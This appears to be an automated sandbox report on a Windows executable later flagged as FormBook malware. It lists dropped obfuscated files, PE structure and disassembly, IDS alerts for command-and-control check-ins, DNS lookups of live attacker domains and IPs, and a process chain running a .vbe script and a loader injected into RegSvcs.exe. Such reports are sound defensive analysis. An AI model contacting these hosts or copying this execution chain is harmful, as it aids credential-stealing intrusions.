                                            Size (bytes):585
                                            Entropy (8bit):5.556687161391297
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:4AC2B920915EA8CB53C91208B2C67596
                                            SHA1:447FBD98D629039FC58103893E170797AB82CFB3
                                            SHA-256:494934E9B75A40123547C78C584B2D70CD87EC91357EA105CF8515DA2F21F35E
                                            SHA-512:0BCD49206A30E24D420AE9857530915EFC3E2CA75777DE4B6CE7280A134115766B68F1EC4B11D1B0A3367228E2F8181B336D968B618184EEC7AFEE0E834E77D0
                                            Malicious:false
                                            Preview:n9q73751HDh9ae818R2911L253k991ZNmD7SHa8Gmg6uT6W50wo1l1Lse..TreeViewConstants ButtonConstants..nZMAs1s5WZZBEM5wc5sOezWX6894wU3iC44Q39X20N1L5x64YWtdP23Gt0nx0EaCd883p3935WR7MH0..GuiDateTimePicker ColorConstants..8SgX84j1A0OtlhZO84O78l1A4m5322wc0P1H9734q737o5Aj8563YZBl4T69Ka69ON23x87w073t98sOH7o2f6CAVAT4xOq173pqA2977631149Wi8791G..DateTimeConstants ToolTipConstants..pfH7h9390WY692S4L48o0r5F1cl1X120292S01f37385zh620RE8WMs72488A0MT18P9a402kGQK4y4B0c18Tm9u15r500r1L14967k94106sxtR74ngzFV3zjd9pFR2c19K8w4611l484kfjOyy4qs6209090959B8l656S696r98Y694kIM91..UpDownConstants GuiDateTimePicker..
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):534
                                            Entropy (8bit):5.499310994661674
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C6B5B5E6F4B85ED8220AC9D2E0C192D2
                                            SHA1:5A3508CEC5AB3EB2E13CE51D375B644256964941
                                            SHA-256:DB7C678CC3F9E92857EA22C3648973E54BE21C840C0457DBF54C36A07CEDF374
                                            SHA-512:3EFF207263D3B6BC5F87BA296F715FFA2A3F74FEFAD443A6895ABD55370E975FB3EB029AA16D0EA7B7F5C5AD0A913C014BC8A251B68E552382B4D2952653BA84
                                            Malicious:false
                                            Preview:67389r2fv952703hOL54vhKZ65XlgFA77u248g5931sO..BorderConstants FileConstants..0X188R3WQvs0046Ho2yn61h97Wa11quEjLHGcX52623As8725cGifZ04DnPYYre643j52Dm7YsHTb3qmjS35L8c8Z97b1806R..FontConstants GuiDateTimePicker..hZ5R842M952714312iEANN0S0Eu43496044r05v0Ev45uCFpF1tE3CoA33S8JQe67f8i7l05..ColorConstants ColorConstants..4zh3tU2h02H912..FileConstants ToolbarConstants..269b20uVot1a1537c779Fo37uh75P1OuttD6N04210Xm9k26slr1u6o677PEdqx0iU6E5mV1hq4bjJ4U816a85u1aZ1679OX3jH6836jm0ZJalAXXBe883813h0093Tl8ij833d2E..ColorConstants ToolTipConstants..
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):537
                                            Entropy (8bit):5.55629923462043
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:DD5F53DE2275E35D718066F0178B5F35
                                            SHA1:788A5DE3666271F43846D7A8C822D75348CE0534
                                            SHA-256:39AF59E1FAD2D7A7B2C68CA8BCE6253396F5B20E7364C421B4336091C8426904
                                            SHA-512:EB844EE731E4D6478ABC2F31D056D5CB67ED6F90A3BECADD1E50D9AA00C13D9A639111DE280AD9BB286A3BDA4F07BADDDA7543E014FAA513EC6983C497E78959
                                            Malicious:false
                                            Preview:1l3au13S4jpP0mxfB0A6679..ComboConstants FileConstants..y1tt2h0x65..FileConstants ColorConstants..fHueA831D2L52s2996o063964SO6cYvSHq57626G2I12U671hQf5C5o4HW25w4S9j..GuiDateTimePicker UpDownConstants..85m4hOYUlXNH80lp3uQO9bB8M2IWm817V262We6m1X705GAS90laN7301D6qr4EVLiZB951dt5tQ6852RJ949yCOgJJ6Z389R4Ug98x14yH92Z8O3w7Kej..UpDownConstants FileConstants..122O1768473W2j8v2y38x08W9Fx87x8a6u89Y9aX5Sa27c964NZ..DateTimeConstants TreeViewConstants..36CC6o9118ytdBHjEmZ5t45c947g9ZQnzc8C224qn84wcHP336iLypP190..TreeViewConstants TreeViewConstants..
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):616
                                            Entropy (8bit):5.578959754900461
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:5D40EF3055F3411CEDD99FFDA78AEB6A
                                            SHA1:40DCA8CBCC56E86DFEDDEC3D9B97EAB3C16AB293
                                            SHA-256:FAEB0905278B1CF6F15CB452231D4AB3660B1AC964B44C3AA5FE23C3D4B42F7C
                                            SHA-512:48C2077AA4DF87063F5F7F14D3639CA65D44CE6082870F85AEB7968428797FE6049EE9AF68B2FA14689381046BE1650E4C49E7CC35E860AA79CE58D8C0E0EBC8
                                            Malicious:false
                                            Preview:2387Xkp71165j82B700004CJ3z5766gn991895Va4CEUr8N725M75Q4Ma1np35lKLL2R..ColorConstants ToolTipConstants..05938Gql9135GJ1JCws7314lAmd4L65g7RPs579I4251RGg93x42aN94mtQXP3V2qFqXl9wQ9lZo49kY3zd9Cl8..ToolbarConstants ToolTipConstants..j9F7nq179k418MBr69gC0OVz7656A71273GrP58562mcO054A9HZ57A4wPL2tK23088aiS98356cOea83u6ca2yd7GtWT7qqI5OW1c254ff4..GuiDateTimePicker ToolbarConstants..J4bvf8187083gpeyqg360MMy75uy3hDndoR0107T99YY5L996LL6033lOLHU6Ypj1OJ1nd6w0I5b87e3Bh2..ButtonConstants ToolTipConstants..93kgXG4u68N4wb1el8162144y7S8380O3GgGnRtx5a1ZO6s1YcdRojJ8n0ip51d126dW1t6g461wI72N0ZDxk4bz4..ToolbarConstants ComboConstants..
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):84
                                            Entropy (8bit):5.027991721182001
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:D83D800C99EE4F3EC5D5A4E21DAB8D8D
                                            SHA1:18095FA1F479692FDB783E430BB4B6712F517346
                                            SHA-256:7C19D455CBC019F7B44AE40359C217189A82AEED33695A444EF7F441E5D3DB8E
                                            SHA-512:67215D3E168D4AD2F6F156EA4AFD0725C8BDF9F491FE84D92C969110A5B51DF36DD7B2E00F39BEF8FD88F0AC82964AD63E444C75D514D3C6E9F382C67B033C41
                                            Malicious:false
                                            Preview:[S3tt!ng]..stpths=%userprofile%..Key=WindowsUpdate..Dir3ctory=ruum..ExE_c=avqj.mp2..
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.815237922079781
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:u549ed5dEA.exe
                                            File size:1'323'723 bytes
                                            MD5:9c520c748bec9e504a1911bb4d975732
                                            SHA1:1931d33ef9ea91279c3ad469e97c04e1e8cbd93a
                                            SHA256:f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7
                                            SHA512:5c99e5cad1edc66462a9f31dc47a3018342c6f5268e8d187dd77f1442c7038671996e2eb7eb27d751d3650ca828e8896a673b57ef46d6325d3fedc397883adf0
                                            SSDEEP:24576:iN/BUBb+tYjBFHk+/VKEKhkiM70vvMBGdoenXiM0hD6di/A1:CpUlRhkI4m0vZ1XiM0hDTO
                                            TLSH:AA5512027BC48073D1B225315AB29754197D7E605FA18A9B53D03DBE9F70AC2D632FA3
                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
                                            Icon Hash:3371f1a5e1534a33
                                            Entrypoint:0x4265d0
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:99ee65c2db82c04251a5c24f214c8892
                                            Instruction
                                            call 00007F60AC7E473Bh
                                            jmp 00007F60AC7E40BDh
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push ecx
                                            lea ecx, dword ptr [esp+08h]
                                            sub ecx, eax
                                            and ecx, 0Fh
                                            add eax, ecx
                                            sbb ecx, ecx
                                            or eax, ecx
                                            pop ecx
                                            jmp 00007F60AC7E376Fh
                                            push ecx
                                            lea ecx, dword ptr [esp+08h]
                                            sub ecx, eax
                                            and ecx, 07h
                                            add eax, ecx
                                            sbb ecx, ecx
                                            or eax, ecx
                                            pop ecx
                                            jmp 00007F60AC7E3759h
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 0Ch
                                            lea ecx, dword ptr [ebp-0Ch]
                                            call 00007F60AC7D6C99h
                                            push 0044634Ch
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            call 00007F60AC7E4F67h
                                            int3
                                            jmp 00007F60AC7EAC9Eh
                                            int3
                                            int3
                                            push 004293C0h
                                            push dword ptr fs:[00000000h]
                                            mov eax, dword ptr [esp+10h]
                                            mov dword ptr [esp+10h], ebp
                                            lea ebp, dword ptr [esp+10h]
                                            sub esp, eax
                                            push ebx
                                            push esi
                                            push edi
                                            mov eax, dword ptr [00449778h]
                                            xor dword ptr [ebp-04h], eax
                                            xor eax, ebp
                                            push eax
                                            mov dword ptr [ebp-18h], esp
                                            push dword ptr [ebp-08h]
                                            mov eax, dword ptr [ebp-04h]
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            mov dword ptr [ebp-08h], eax
                                            lea eax, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], eax
                                            ret
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            mov ecx, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], ecx
                                            pop ecx
                                            pop edi
                                            pop edi
                                            pop esi
                                            pop ebx
                                            mov esp, ebp
                                            pop ebp
                                            push ecx
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x47d70 | 0x34 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47da4 | 0x50 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x17ee4 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0x2afc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x44580 | 0x54 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x44600 | 0x18 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3ec58 | 0x40 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x280 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4722c | 0x120 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0x3a32c | 0x3a400 | e320764e1b3c816ba80aeb820cb8a274 | False | 0.581381605418455 | data | 6.685359764265178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x3c000 | 0xcbf8 | 0xcc00 | 47c3be3304bfdfb2a778f355849d1c3f | False | 0.4439529718137255 | data | 5.167069652624378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0x49000 | 0xd7e0 | 0x1200 | 6335f9314c2900dccb530e151f1b1ee8 | False | 0.3956163194444444 | data | 4.0290550032041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .didat | 0x57000 | 0x1a8 | 0x200 | 232a8fe82993b55cefe09cffc39a79b0 | False | 0.462890625 | data | 3.5080985761326375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc | 0x58000 | 0x17ee4 | 0x18000 | 7a6f4fdc915a9e791c0d436729708e3a | False | 0.7992757161458334 | data | 7.356836112369401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x70000 | 0x2afc | 0x2c00 | 98fd4bc572f87a21f69dc57f720a6dbc | False | 0.75 | data | 6.617141671767599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            PNG | 0x58704 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                            PNG | 0x5924c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                            RT_ICON | 0x5a7f8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | | | 0.374390243902439
                                            RT_ICON | 0x5ae60 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.4435483870967742
                                            RT_ICON | 0x5b148 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.5608108108108109
                                            RT_ICON | 0x5b270 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.6396588486140725
                                            RT_ICON | 0x5c118 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.7256317689530686
                                            RT_ICON | 0x5c9c0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.4624277456647399
                                            RT_ICON | 0x5cf28 | 0xcdff | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9972693656964066
                                            RT_ICON | 0x69d28 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.5239626556016598
                                            RT_ICON | 0x6c2d0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.6015478424015009
                                            RT_ICON | 0x6d378 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.7783687943262412
                                            RT_DIALOG | 0x6d7e0 | 0x286 | data | English | United States | 0.5092879256965944
                                            RT_DIALOG | 0x6da68 | 0x13a | data | English | United States | 0.60828025477707
                                            RT_DIALOG | 0x6dba4 | 0xec | data | English | United States | 0.6991525423728814
                                            RT_DIALOG | 0x6dc90 | 0x12e | data | English | United States | 0.5927152317880795
                                            RT_DIALOG | 0x6ddc0 | 0x338 | data | English | United States | 0.45145631067961167
                                            RT_DIALOG | 0x6e0f8 | 0x252 | data | English | United States | 0.5757575757575758
                                            RT_STRING | 0x6e34c | 0x1e2 | data | English | United States | 0.3900414937759336
                                            RT_STRING | 0x6e530 | 0x1cc | data | English | United States | 0.4282608695652174
                                            RT_STRING | 0x6e6fc | 0x1b8 | data | English | United States | 0.45681818181818185
                                            RT_STRING | 0x6e8b4 | 0x146 | data | English | United States | 0.5153374233128835
                                            RT_STRING | 0x6e9fc | 0x46c | data | English | United States | 0.3454063604240283
                                            RT_STRING | 0x6ee68 | 0x166 | data | English | United States | 0.49162011173184356
                                            RT_STRING | 0x6efd0 | 0x152 | data | English | United States | 0.5059171597633136
                                            RT_STRING | 0x6f124 | 0x10a | data | English | United States | 0.49624060150375937
                                            RT_STRING | 0x6f230 | 0xbc | data | English | United States | 0.6329787234042553
                                            RT_STRING | 0x6f2ec | 0x1c0 | data | English | United States | 0.5178571428571429
                                            RT_STRING | 0x6f4ac | 0x250 | data | English | United States | 0.44256756756756754
                                            RT_GROUP_ICON | 0x6f6fc | 0x92 | data | | | 0.6438356164383562
                                            RT_MANIFEST | 0x6f790 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                                            DLL | Import
                                            KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                            OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                            gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                            Language of compilation system | Country where language is spoken | Map
                                            English | United States |
                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                            2025-01-08T16:21:22.629497+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49977 | 188.114.96.3 | 80 | TCP
                                            2025-01-08T16:21:39.804507+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49978 | 206.238.89.119 | 80 | TCP
                                            2025-01-08T16:21:42.398283+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49979 | 206.238.89.119 | 80 | TCP
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Jan 8, 2025 16:21:21.921103954 CET | 56139 | 53 | 192.168.2.5 | 1.1.1.1
                                            Jan 8, 2025 16:21:21.934520006 CET | 53 | 56139 | 1.1.1.1 | 192.168.2.5
                                            Jan 8, 2025 16:21:37.735791922 CET | 62177 | 53 | 192.168.2.5 | 1.1.1.1
                                            Jan 8, 2025 16:21:38.227185965 CET | 53 | 62177 | 1.1.1.1 | 192.168.2.5
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Jan 8, 2025 16:21:21.921103954 CET | 192.168.2.5 | 1.1.1.1 | 0x95bc | Standard query (0) | www.supernutra01.online | A (IP address) | IN (0x0001) | false
                                            Jan 8, 2025 16:21:37.735791922 CET | 192.168.2.5 | 1.1.1.1 | 0xae27 | Standard query (0) | www.127358.win | A (IP address) | IN (0x0001) | false
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Jan 8, 2025 16:21:21.934520006 CET | 1.1.1.1 | 192.168.2.5 | 0x95bc | No error (0) | www.supernutra01.online | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                            Jan 8, 2025 16:21:21.934520006 CET | 1.1.1.1 | 192.168.2.5 | 0x95bc | No error (0) | www.supernutra01.online | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                            Jan 8, 2025 16:21:38.227185965 CET | 1.1.1.1 | 192.168.2.5 | 0xae27 | No error (0) | www.127358.win | | 206.238.89.119 | A (IP address) | IN (0x0001) | false


                                            Target ID:0
                                            Start time:10:18:59
                                            Start date:08/01/2025
                                            Path:C:\Users\user\Desktop\u549ed5dEA.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\u549ed5dEA.exe"
                                            Imagebase:0xc90000
                                            File size:1'323'723 bytes
                                            MD5 hash:9C520C748BEC9E504A1911BB4D975732
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:10:19:04
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\wscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe"
                                            Imagebase:0xdd0000
                                            File size:147'456 bytes
                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:10:19:13
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                            Imagebase:0x790000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls
                                            Imagebase:0x790000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                            Wow64 process (32bit):true
                                            Commandline:ipconfig /release
                                            Imagebase:0xf30000
                                            File size:29'184 bytes
                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            Wow64 process (32bit):true
                                            Commandline:avqj.mp2 awggmrd.xls
                                            Imagebase:0xe80000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:10
                                            Start time:10:19:17
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                            Imagebase:0x790000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:10:19:17
                                            Start date:08/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:10:19:17
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                            Wow64 process (32bit):true
                                            Commandline:ipconfig /renew
                                            Imagebase:0xf30000
                                            File size:29'184 bytes
                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:13
                                            Start time:10:19:24
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x8e0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:14
                                            Start time:10:19:25
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x7ff6d64d0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
